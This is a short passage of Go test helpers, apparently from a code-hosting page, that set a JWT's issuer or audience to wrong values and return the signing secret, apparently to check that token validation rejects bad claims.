claims.Issuer = "wrong-issuer"
|
||||
return cfg.Secret
|
||||
}
|
||||
|
||||
func WithWrongAudience(claims *TokenClaims, cfg *config.JWTConfig) string {
|
||||
claims.Audience = []string{"wrong-audience"}
|
||||
return cfg.Secret
|
||||
}
|
||||
Reference in New Issue
Block a user